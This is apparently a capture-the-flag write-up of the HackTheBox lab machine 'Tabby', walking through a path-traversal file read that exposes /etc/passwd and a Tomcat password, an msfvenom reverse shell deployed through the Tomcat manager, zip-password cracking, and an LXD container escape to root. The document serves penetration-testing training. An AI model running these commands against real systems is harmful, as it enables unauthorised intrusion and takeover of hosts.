Tabby
Hacking For RamenTabby is an easy Linux machine from HackTheBox, that is part of the pool of machines that recommended for preparation for OSCP certification.
> Content table
- Enumeration
- Exploitation of Tomcat
- Privilege escalation with LXC containers
> Enumeration
Start with nmap scan:
nmap -sC -sV 10.10.10.194 Starting Nmap 7.80 ( https://nmap.org ) at 2020-07-10 06:30 EDT Nmap scan report for 10.10.10.194 Host is up (0.021s latency). Not shown: 997 closed ports PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4 (Ubuntu Linux; protocol 2.0) 80/tcp open http Apache httpd 2.4.41 ((Ubuntu)) |_http-server-header: Apache/2.4.41 (Ubuntu) |_http-title: Mega Hosting 8080/tcp open http Apache Tomcat |_http-open-proxy: Proxy might be redirecting requests |_http-title: Apache Tomcat Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
> Exploitation of Tomcat
The service that running on port 80 is vulnerable to LFI, and that’s led to the exposure of the /etc/passwd
view-source:http://10.10.10.194/news.php?file=../../../../../etc/passwd root:x:0:0:root:/root:/bin/bash daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin bin:x:2:2:bin:/bin:/usr/sbin/nologin sys:x:3:3:sys:/dev:/usr/sbin/nologin sync:x:4:65534:sync:/bin:/bin/sync games:x:5:60:games:/usr/games:/usr/sbin/nologin man:x:6:12:man:/var/cache/man:/usr/sbin/nologin lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin mail:x:8:8:mail:/var/mail:/usr/sbin/nologin news:x:9:9:news:/var/spool/news:/usr/sbin/nologin uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin proxy:x:13:13:proxy:/bin:/usr/sbin/nologin www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin backup:x:34:34:backup:/var/backups:/usr/sbin/nologin list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin systemd-network:x:100:102:systemd Network Management,,,:/run/systemd:/usr/sbin/nologin systemd-resolve:x:101:103:systemd Resolver,,,:/run/systemd:/usr/sbin/nologin systemd-timesync:x:102:104:systemd Time Synchronization,,,:/run/systemd:/usr/sbin/nologin messagebus:x:103:106::/nonexistent:/usr/sbin/nologin syslog:x:104:110::/home/syslog:/usr/sbin/nologin _apt:x:105:65534::/nonexistent:/usr/sbin/nologin tss:x:106:111:TPM software stack,,,:/var/lib/tpm:/bin/false uuidd:x:107:112::/run/uuidd:/usr/sbin/nologin tcpdump:x:108:113::/nonexistent:/usr/sbin/nologin landscape:x:109:115::/var/lib/landscape:/usr/sbin/nologin pollinate:x:110:1::/var/cache/pollinate:/bin/false sshd:x:111:65534::/run/sshd:/usr/sbin/nologin systemd-coredump:x:999:999:systemd Core Dumper:/:/usr/sbin/nologin lxd:x:998:100::/var/snap/lxd/common/lxd:/bin/false tomcat:x:997:997::/opt/tomcat:/bin/false mysql:x:112:120:MySQL Server,,,:/nonexistent:/bin/false ash:x:1000:1000:clive:/home/ash:/bin/bash
It took a while to find the tomcat-users.xml file, as usually it’s located at usr/share/tomcat9/conf/tomcat-users.xml. In that case, you can find the tomcat-users.xml file at view-source:http://10.10.10.194/news.php?file=../../../../../../usr/share/tomcat9/etc/tomcat-users.xml.
Content of the file:
<role rolename="admin-gui"/> <role rolename="manager-script"/> <user username="tomcat" password="$3cureP4s5w0rd123!" roles="admin-gui,manager-script"/>
Creating a reverse shell:
msfvenom -p java/jsp_shell_reverse_tcp LHOST=10.10.14.8 LPORT=53 -f war > shell.war
Port number can be any. Here I’m just trying to follow the approachWhat if there would be a firewall?and not using something sketchy as port4444
Uploading the reverse shell:
curl -u 'tomcat':'$3cureP4s5w0rd123!' -T shell.war 'http://10.10.10.194:8080/manager/text/deploy?path=/shell'
Starting a listener on port 53
nc -nlvp 53
Triggering the shell:
curl -u 'tomcat':'$3cureP4s5w0rd123!' http://10.10.10.194:8080/shell/
Upgrading the shell to fully TTY:
python3 -c 'import pty;pty.spawn("/bin/bash")'
export TERM=xterm-256color
CTRL+Z
stty raw -echo
fg
> Privilege escalation with LXC containers
From /etc/passwd file we know that user ash exists in the system. Enumeration PrivEsc ways with linpeas.sh can spot the file 16162020_backup.zip in /var/www/html/files/
Download it to the Kali instance and cracking with fcrackzip:
fcrackzip -D -p /usr/share/wordlists/rockyou.txt 16162020_backup.zip
Mentioned .zip file contains credentials ash:admin@it.
Switching user with su command.
ash@tabby:~$ id uid=1000(ash) gid=1000(ash) groups=1000(ash),4(adm),24(cdrom),30(dip),46(plugdev),116(lxd)
What’s LXD?
LXD is a next generation system container manager. It offers a user experience similar to virtual machines but using Linux containers instead.
Building a custom container:
git clone https://github.com/saghul/lxd-alpine-builder.git cd lxd-alpine-builder sudo bash build-alpine
Uploading the new file to the machine and starting exploitation:
lxc image import ./alpine-v3.12-x86_64-20200710_0823.tar.gz --alias exploit
A list of images can be checked with the command:
lxc image list +---------+--------------+--------+-------------------------------+--------------+-----------+--------+------------------------------+ | ALIAS | FINGERPRINT | PUBLIC | DESCRIPTION | ARCHITECTURE | TYPE | SIZE | UPLOAD DATE | +---------+--------------+--------+-------------------------------+--------------+-----------+--------+------------------------------+ | exploit | 35186ff8d0a4 | no | alpine v3.12 (20200710_08:23) | x86_64 | CONTAINER | 3.05MB | Jul 10, 2020 at 3:28pm (UTC) | +---------+--------------+--------+-------------------------------+--------------+-----------+--------+------------------------------+
The container has been created. Now you can initiate this container as a privileged one and mount a disk as a device:
lxc init exploit honk -c security.privileged=true lxc config device add honk roguedevice disk source=/ path=/mnt/root recursive=true lxc start honk lxc exec honk /bin/sh
As a result, you will spawn a root shell.